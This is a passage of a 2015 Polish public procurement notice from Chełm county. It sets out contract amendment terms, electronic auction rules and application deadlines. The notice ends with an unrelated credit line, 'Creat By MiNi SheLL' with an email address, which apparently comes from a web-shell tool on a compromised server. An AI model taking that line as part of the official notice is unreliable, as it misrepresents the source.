d)	wadami dokumentacji projektowej uniemożliwiającymi prawidłowe wykonanie przedmiotu umowy zgodnie z zasadami sztuki budowlanej i skutkującymi przerwą w realizacji robót budowlanych,
e)	wydłużeniem czasu realizacji inwestycji, której ma ten nadzór dotyczyć. 
2)	zmiany osób przewidzianych do realizacji zamówienia przez strony w przypadku zdarzeń takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków pod warunkiem, że zaproponowane osoby będą miały kwalifikacje nie niższe od osób wskazanych w umowie.
Zmiany umowy wymagają zgody Zamawiającego i Wykonawcy w formie sporządzonego na piśmie i podpisanego przez strony aneksu. Poza przypadkami wymienionymi wyżej Zamawiający nie przewiduje zmiany innych istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> bip.powiat.chelm.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1.	Wykonawcy dopuszczeni do udziału w licytacji elektronicznej zostaną zaproszeni do składania ofert, a ich dane zostaną przesłane do Urzędu Zamówień Publicznych na platformę do prowadzenia licytacji elektronicznych znajdującą się pod adresem https://licytacje.uzp.gov.pl. 
2.	Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się w systemie jako Wykonawca. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do udziału w licytacji, winien zarejestrować się w tym systemie przed wysłaniem wniosku o dopuszczenie do udziału w licytacji, a wraz z wnioskiem winien przekazać Zamawiającemu informację o swoim loginie (identyfikatorze).
3.	Pomoc w sposobie rejestracji i odpowiedzi na ewentualne problemy znajdują się w Menu na głównej stronie platformy licytacji w zakładce Samouczek.
4.	Wymagania techniczne: Komputer PC (lub równoważny) z systemem operacyjnym Windows/Linux oraz podłączony do sieci Internet. Zainstalowana przeglądarka: MS Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub wyższej..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1.	Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto.
2.	W toku licytacji elektronicznej Wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia.
3.	Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą.
4.	W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach (grosze należy oddzielić od złotych kropką).
5.	Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia.
6.	Jedno postąpienie (minimalna różnica między kolejnymi ofertami) wynosi 200,00 zł brutto (słownie: dwieście złotych 00/100). 
7.	Licytacja elektroniczna rozpoczyna się od ceny wywoławczej 11 070,00 zł brutto (słownie: jedenaście tysięcy siedemdziesiąt złotych 00/100). 
8.	W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym, że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> po upływie 15 minut od czasu ostatniego postąpienia w przypadku braku kolejnych ofert</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 22.07.2015 godzina 10:00, miejsce: Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, I piętro, pokój Nr 127.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Otwarcie licytacji elektronicznej nastąpi nie wcześniej niż 5 dni od dnia przekazania zaproszenia do udziału w licytacji. Dokładna data i godzina zostaną podane w zaproszeniu..</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Zamknięcie licytacji elektronicznej nastąpi po upływie 15 minut od czasu ostatniego postąpienia w przypadku braku kolejnych ofert.</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający nie żąda od Wykonawców wniesienia zabezpieczenia należytego wykonania umowy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Istotne dla stron postanowienia umowy zawarte są w projekcie umowy będącej załącznikiem do niniejszego ogłoszenia zamieszczonej na stronie internetowej Zamawiającego</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Wniosek wraz z załącznikami należy umieścić w zamkniętym opakowaniu uniemożliwiającym odczytanie zawartości bez uszkodzenia tego opakowania. 
2.	Wniosek składa się w formie pisemnej. 
3.	Wniosek i jego załączniki muszą być opieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnione do reprezentowania Wykonawcy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com